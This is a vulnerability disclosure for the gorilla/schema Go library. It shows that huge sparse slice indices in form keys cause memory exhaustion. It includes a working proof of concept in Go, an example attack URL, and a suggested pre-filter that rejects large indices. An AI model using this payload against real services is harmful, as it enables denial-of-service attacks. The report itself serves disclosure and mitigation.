Running schema.Decoder.Decode() on a struct that has a field of type []struct{...} exposes it to memory-exhaustion attacks that abuse the sparse-slice functionality. For instance, in the proof of concept below, an attacker can set a field on the billionth element, and the decoder will allocate every element before it in the slice.
In my project's local environment, I was able to call an endpoint like /innocent_endpoint?arr.10000000.X=1 and freeze my system through the memory allocated while parsing r.Form. I believe this line is responsible for allocating the slice, although I haven't verified it, so it's an educated guess.
The following proof of concept works on both v1.2.0 and v1.2.1. I have not tested earlier versions.
package main

import (
	"fmt"

	"github.com/gorilla/schema"
)

func main() {
	dec := schema.NewDecoder()
	var result struct {
		Arr []struct{ Val int }
	}
	if err := dec.Decode(&result, map[string][]string{"arr.1000000000.Val": {"1"}}); err != nil {
		panic(err)
	}
	fmt.Printf("%#+v\n", result)
}
Any use of schema.Decoder.Decode() on a struct containing slices of structs could be vulnerable to this memory-exhaustion issue. There appears to be nothing a developer using this library can do to disable the behaviour without a fix in this project, so every use of Decode that matches this pattern is affected. A fix that avoids a major change may also be hard to find, since it could break compatibility with other intended use cases.
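Until the library itself caps the index, one stopgap is to validate form keys before handing them to Decode. The sketch below is a hypothetical workaround of my own, not part of gorilla/schema's API: rejectLargeIndices walks the dotted path segments of each key and refuses any numeric segment above a chosen limit, so oversized indices never reach the decoder.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// rejectLargeIndices is a hypothetical pre-filter (not a gorilla/schema
// function): it splits each form key on "." and returns an error if any
// segment parses as an integer greater than maxIndex.
func rejectLargeIndices(form map[string][]string, maxIndex int) error {
	for key := range form {
		for _, seg := range strings.Split(key, ".") {
			if n, err := strconv.Atoi(seg); err == nil && n > maxIndex {
				return fmt.Errorf("index %d in key %q exceeds limit %d", n, key, maxIndex)
			}
		}
	}
	return nil
}

func main() {
	form := map[string][]string{"arr.1000000000.Val": {"1"}}
	if err := rejectLargeIndices(form, 1000); err != nil {
		fmt.Println("rejected:", err)
		return
	}
	// Only now would it be safe to call dec.Decode(&result, form).
}
```

This only mitigates the issue at call sites that remember to use it; a real fix would enforce a limit inside the decoder itself.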